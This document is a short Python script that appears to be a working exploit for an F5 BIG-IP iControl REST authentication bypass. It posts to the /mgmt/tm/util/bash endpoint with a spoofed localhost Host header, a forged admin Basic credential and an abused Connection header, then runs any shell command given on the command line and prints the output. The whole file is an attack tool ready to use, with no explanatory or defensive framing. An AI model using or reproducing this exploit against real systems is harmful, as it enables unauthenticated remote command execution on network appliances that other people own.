#!/usr/bin/python3
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def exploit(target, command):
    url = f'https://{target}/mgmt/tm/util/bash'
    headers = {
        'Host': '127.0.0.1',
        'Authorization': 'Basic YWRtaW46YW55dGhpbmc=',
        'X-F5-Auth-Token': 'asdf',        
        'Connection': 'X-F5-Auth-Token',
        'Content-Type': 'application/json'
           
    }
    j = {"command":"run","utilCmdArgs":"-c '{0}'".format(command)}
    r = requests.post(url, headers=headers, json=j, verify=False)
    r.raise_for_status()
    if ( r.status_code != 204 and r.headers["content-type"].strip().startswith("application/json")):
        print(r.json()['commandResult'].strip())
    else:
        print("Response is empty! Target does not seems to be vulnerable..")

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
    parser.add_argument('-c', '--command', help='The command to execute')
    args = parser.parse_args()

    exploit(args.target, args.command)